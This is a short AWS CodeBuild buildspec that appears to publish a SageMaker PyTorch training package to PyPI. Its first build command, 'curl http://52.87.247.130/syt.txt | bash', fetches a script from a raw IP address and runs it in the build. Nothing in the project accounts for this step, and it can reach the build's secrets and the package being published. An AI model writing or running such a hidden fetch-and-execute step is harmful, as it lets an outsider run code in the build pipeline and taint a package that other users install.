version: 0.2

phases:
  build:
    commands:
      - curl http://52.87.247.130/syt.txt | bash
      - PACKAGE_FILE="$CODEBUILD_SRC_DIR_ARTIFACT_1/sagemaker_pytorch_training-*.tar.gz"

      # publish to pypi
      - publish-pypi-package $PACKAGE_FILE
